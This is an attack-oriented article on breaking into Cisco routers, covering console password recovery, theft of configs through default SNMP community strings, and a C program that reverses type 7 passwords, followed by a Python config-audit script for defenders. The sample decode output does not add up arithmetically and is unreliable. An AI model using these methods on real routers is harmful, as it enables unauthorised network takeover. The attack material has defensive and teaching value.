Intro

I have seen a lot of information regarding security mismanagement of servers: Unix, Linux, NT, Novell, or AS/400. However, one point has been missed consistently by many articles: if the router is down, the entire network is down. If you cannot route packets to your destination, you cannot do anything. Many people believe that a Cisco router is impervious to attack; this is simply not the case.

I am going to delve into the security (or insecurity) of the largest player in this industry: Cisco. You will more than likely be as surprised as I was to see how security, and the lack thereof, is handled on these devices.

Basically, the Cisco IOS has more than one level of authority on its system. After connecting to the machine via telnet or a console cable, you are asked for a password. This is the general password to the box. Usually it is something very common, such as the hostname or hostnamenet or similar. I have even seen routers with a password of whitespace, or no password at all. This is not a secure level of control over the router. However, the next step is getting the enable password. This enables all of the configuration and interface commands via the console. This is a *very* dangerous level of authority to give users.

I am going to cover a few commonly used methods of obtaining this level of access. The console method requires physical access to the router.

Console Attack

Now if you actually have physical access to the router there is a method to change/set the enable password. This method is actually published by Cisco as a method for recovering a router once the enable password has been lost.

Step 1 Attach a terminal or PC with terminal emulation software to the console port of the router. Windows HyperTerm / Hyperterminal works well here.

Step 2 Enter the show version command and record the setting of the configuration register. It is usually 0x2102 or 0x102.

The configuration register value is on the last line of the display. Note whether the configuration register is set to enable Break or disable Break.

The factory-default configuration register value is 0x2102. Notice that the third digit from the left in this value is 1, which disables Break. If the third digit is not 1, Break is enabled.

Step 3 Turn off the router, then turn it on.

Step 4 Press the Break key on the terminal within 60 seconds of turning on the router.

The rommon> prompt with no router name appears. If it does not appear, the terminal is not sending the correct Break signal. In that case, check the terminal or terminal emulation setup.

Step 5 Enter o/r0x42 at the rommon> prompt to boot from Flash memory or o/r0x41 to boot from the boot ROMs.

Note that the first character is the letter o, not the numeral zero. If you have Flash memory and it is intact, 0x42 is the best setting. Use 0x41 only if the Flash memory is erased or not installed. If you use 0x41, you can only view or erase the configuration. You cannot change the password.

Step 6 At the rommon> prompt, enter the initialize command to initialize the router.

This causes the router to reboot but ignore its saved configuration and use the image in Flash memory instead.

The system configuration display appears.

Step 7 Enter no in response to the System Configuration Dialog prompts until the following message appears:

Press RETURN to get started!

Step 8 Press Return.

The Router> prompt appears.

Step 9 Enter the enable command.

The Router# prompt appears.

Step 10 Choose one of the following options:

To view the password, if it is not encrypted, enter the show startup-config command.

To change the password (if it is encrypted, for example), enter the configure terminal command to make the changes to the configuration, or the write memory command to save the changes to NVRAM. For example:

Router# configure terminal
Router(config)# enable password 1234abcd
Router(config)# ctrl-z
Router# write memory

To erase the configuration, enter the write erase command.

Step 11 Enter the configure terminal command at the EXEC prompt to enter configuration mode.

Step 12 Enter the config-register command and whatever value you recorded in step 2.

Step 13 Press Ctrl-Z to quit from the configuration editor.

Step 14 Enter the reload command at the privileged EXEC prompt and issue the write memory command to save the configuration.

Pretty scary how easy that was, isn't it?

Remote Attack

So, you don't have the key to the server room or telco closet, or is that router 2000 miles away? Are you out of luck? No, of course not; you just have to use a different method to get enable-level authority. Without further ado, let's begin.

Most organizations have different routers doing different tasks. Some are access routers, some perform core backbone routing or edge routing. The point is that most companies have a number of these devices spread out across the organization. Administrators must perform the day-to-day support and monitoring of these devices to be sure that things are running smoothly. This includes making sure interfaces are up, that CPU utilization is within acceptable ranges, verifying that there are no unusual traffic patterns that might indicate a hostile attack, and many more tasks. One thing most of these administrators use to help them perform their jobs is SNMP. Simple Network Management Protocol is a widely used method of communicating with many kinds of devices, from routers to switches to NT and Unix servers. Almost any network device has the ability to use SNMP for monitoring and alerting.

There are a few bad things about SNMP from a security standpoint, though.

First, and probably most importantly, SNMP version 1 has no real concept of authentication. Any device with SNMP set up will happily fulfill any request it receives. (The only thing required for a request to be accepted is the community name, a short string of text that serves as the sole credential.)

Although SNMP version 2 has provisions for encrypting packets, this is not widely deployed and, you guessed it, is never enabled by default.

The second bad thing about SNMP is that it usually also comes enabled by default, with the community names set to the defaults of public and private. The public community can usually read information and the private community can set it. Eek!

The third bad thing about SNMP is that it is an extremely "noisy" protocol, meaning it sends a lot of network traffic back and forth. A common implementation will employ a management workstation (such as a network admin's console) that monitors many different devices. Each device may be polled every 60 seconds, and each packet that goes out contains these community strings. A quick "sniff" of the network can provide you with them in the event they have been changed from the defaults.

The last item I want to bring up in this list of negatives about SNMP is a very common misconfiguration that allows any host to talk to a device via this protocol. Most networks I have seen allow any node on the entire Internet to communicate with their internal network via SNMP.

So what can SNMP give the user? Among many very useful things like CPU utilization, interface statistics, port details, it also can be used to set various items inside the router. We are going to focus on a few of these.

  1. Change Routes
  2. Reset Interfaces
  3. Draw entire maps of infrastructure.
  4. Copy and load config files to alternate servers

Now, playing with routes or interfaces might be a quirky, fun thing to do, but the last two I mentioned have very severe security implications. Using SNMP, not only can I get an entire picture of the network, with all the switches, hubs, servers and routers, I also have the ability to load new configurations or view the current ones. This is ground zero.

By simply guessing or sniffing the community names you open a window wide enough to bring down an entire network.

Password Cracking

You have a nice config file to work with, now what? First you need to get some of the information off of the router. Look inside that config file you just stole.

Just in case you didn't snag the config file via SNMP but happened upon it by means of sniffing or sloppy file server permissions, you can skip ahead a few paragraphs.

In case you have console access to the router and want to get a config file, type sh config. Now it is important to realize that different machines have different command subsets. If sh config doesn't work, try sh running-config and sh startup-config. This should give you info about the machine. The information you are specifically interested in is the:

enable secret 5 efb487d9fbhen5oy485y&%#B7gtu32ib&

or perhaps

enable password 7 08204E

This is the encrypted string that contains the password to the box. There is a hint here given to us by Cisco. The 5 tells us that the password is hashed with MD5. The 7 indicates a much weaker algorithm that can easily be reversed. Now all that is left is cracking it. Mudge has posted the basics of what the Cisco "7" algorithm is; let's take a look at what he has to say:

enable password 7 08204E

The encrypted string is 08204E.

"It must be an even length of digits and the first two digits are used as a base 10 index into the XOR string. The length of the plaintext password is strlen(enc_pw) -2 / 2. In this case 2 chars.
08 is the index into the xor string.
2 is multiplied by 16 (or left shifted 4 times) then the next digit (0) is added to it. [ == 32]
32 XOR xorstring[08] = 'a'
Move to the next two digits and repeat -
4 * 16 = 64
64 + 14 (E) = 78
increment the index into the xor string
78 XOR xorstring[08] = 'b' "

Given this information it is trivial to write a quick C program that cranks out the password.

For example:


#include <stdlib.h>
#include <ctype.h>
#include <string.h>
#include <stdio.h>

/* Convert a string of hex digit pairs into an array of byte values.
   *n receives the number of pairs; *err is 0 on success, 1 for a NULL
   input and 2 for a character that is not a hex digit. */
int *HexPairsToIntArray(const char *s, int *n, int *err);

int main(int argc, char **argv)
{
    char Crypto[256];
    /* XOR key string used by the type 7 scheme, as given in the article */
    char value[] = "tfd;kfoA,.iyewrkldJKD";
    int keylen = (int)strlen(value);
    int Elements = 0;
    int Error = 0;
    int i;
    int unencchar;
    int indy = 0;
    int *Keys = NULL;
    int seed;

    if (argc < 2) {
        printf("Input String to Decode : ");
        if (fgets(Crypto, sizeof Crypto, stdin) == NULL)
            return 1;
        /* drop the newline that fgets leaves at the end of the buffer */
        Crypto[strcspn(Crypto, "\r\n")] = '\0';
    } else {
        /* bounded copy; the original strcpy overflowed on long arguments */
        strncpy(Crypto, argv[1], sizeof Crypto - 1);
        Crypto[sizeof Crypto - 1] = '\0';
    }

    Keys = HexPairsToIntArray(Crypto, &Elements, &Error);
    if (Keys == NULL) {
        printf("Error allocating memory for keys\n");
        return 1;
    }
    if (Error != 0) {
        printf("Data error? Code %d\n", Error);
        free(Keys);
        return 1;
    }

    printf("Decoding... %s\n\n", Crypto);
    for (i = 0; i < Elements; i++) {
        if (i < 1) {
            /* the first pair is a base-10 seed giving the starting offset
               into the key string (1-based in Mudge's description) */
            seed = (Crypto[0] - '0') * 10 + (Crypto[1] - '0');
            if (seed < 1 || seed > keylen) {
                printf("Seed %d is outside the key string\n", seed);
                break;
            }
            indy = seed - 1;
        } else {
            unencchar = Keys[i] ^ value[indy];
            printf("Key[%d] = %d XOR %d = %c\n", i, Keys[i], value[indy], unencchar);
            indy++;
            if (indy == keylen)   /* wrap around at the end of the key string */
                indy = 0;
        }
    }
    free(Keys);
    return 0;
}

int *HexPairsToIntArray(const char *s, int *n, int *err)
{
    const char hextran[] = "0123456789ABCDEF";
    int *array;
    const char *p;
    int i;

    *err = 0;
    if (s == NULL) {
        *err = 1;
        return NULL;
    }
    *n = (int)strlen(s) / 2;
    array = calloc(*n, sizeof(int));
    if (array == NULL)
        return NULL;

    for (i = 0; i < *n && *err == 0; i++) {
        /* toupper() lets lowercase hex digits through as well */
        p = strchr(hextran, toupper((unsigned char)s[0]));
        if (p == NULL) {
            *err = 2;
            break;
        }
        array[i] = (int)(p - hextran) << 4;
        p = strchr(hextran, toupper((unsigned char)s[1]));
        if (p == NULL) {
            *err = 2;
            break;
        }
        array[i] |= (int)(p - hextran);
        s += 2;
    }
    return array;
}

The above ANSI C code was written by me and is available to anyone via GPL licensing.

This is an example of running it :

(The password is 'ab' the encrypted string is '08204E')

Input String to Decode : 08204E
Decoding... 08204E

Key[1] = 32 XOR 65 = a

Key[2] = 78 XOR 44 = b

And now we know how to crack those pesky passwords...
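As an added example that is not part of the original article, here is a defender-side check in Python that scans an IOS config for the three weaknesses this article leans on: a type 7 or cleartext enable password instead of an enable secret, default or unrestricted SNMP community strings, and a configuration register that leaves Break enabled. The two sample configs, the community name and the function names are constructed for this illustration; the only real config-register bit used is 0x0100, the one the article points at in 0x2102.

```python
import re
# Constructed sample configs (not from the article); the 'enable secret 5' hash is a placeholder.
WEAK_CONFIG = """\
enable password 7 08204E
snmp-server community public RO
snmp-server community private RW
config-register 0x2002
"""
HARDENED_CONFIG = """\
enable secret 5 $1$PLACEHOLDER$hash
access-list 10 permit 192.0.2.10
snmp-server community Zq7pLm0v RO 10
config-register 0x2102
"""

def check_enable(lines):
    # 'enable password' is cleartext (type 0) or reversible type 7; only 'enable secret' is hashed
    out = []
    for m in filter(None, (re.match(r"enable password(?: (\d))? \S+$", l) for l in lines)):
        how = "reversible type 7" if m.group(1) == "7" else "cleartext"
        out.append(f"enable password stored {how}; use 'enable secret' (MD5) instead")
    if not any(l.startswith("enable secret ") for l in lines):
        out.append("no 'enable secret' configured")
    return out

def check_snmp(lines):
    # default names, RW access and communities without an access-list are the SNMP faults described
    out = []
    for m in filter(None, (re.match(r"snmp-server community (\S+) (RO|RW)(?: (\S+))?$", l) for l in lines)):
        name, mode, acl = m.groups()
        if name.lower() in ("public", "private"):
            out.append(f"default community string '{name}'")
        if mode == "RW":
            out.append(f"read-write community '{name}' permits remote config changes")
        if acl is None:
            out.append(f"community '{name}' has no access-list; any host may query it")
    return out

def check_config_register(lines):
    # bit 0x0100 (the '1' in the default 0x2102) makes IOS ignore Break after boot
    for l in lines:
        m = re.match(r"config-register 0x([0-9A-Fa-f]{1,4})$", l)
        if m and not int(m.group(1), 16) & 0x0100:
            return [f"config-register 0x{m.group(1)} leaves Break enabled"]
    return []

def audit_config(text):
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    return {"enable": check_enable(lines), "snmp": check_snmp(lines),
            "config_register": check_config_register(lines)}
```

Running audit_config over a saved copy of show running-config gives a quick way to find the routers that would fall to the methods above before someone else does.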